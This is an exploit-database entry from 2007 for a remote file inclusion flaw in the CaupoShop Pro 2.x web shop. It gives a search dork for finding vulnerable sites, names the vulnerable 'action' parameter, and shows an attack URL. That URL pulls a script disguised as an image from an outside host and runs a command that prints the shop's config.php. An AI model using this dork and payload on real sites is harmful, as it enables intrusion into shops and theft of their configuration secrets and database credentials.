CaupoShop Pro 2.x - 'action' Remote File Inclusion

EDB-ID:

4577

Author:

mozi

Type:

webapps

Platform:

PHP

Published:

2007-10-28

ork:allinurl:index.php?action= basket sid
vuln:index.php?action=
examples:
http://www.xxx.com/shop/index.php?action=http://adek.org/o.gif?&cmd=cat%20config.php

author:mozi2weed@yahoo.com
site:http://mozi.rootmybox.org
support:http://darkc0de.com & whoami

# milw0rm.com [2007-10-28]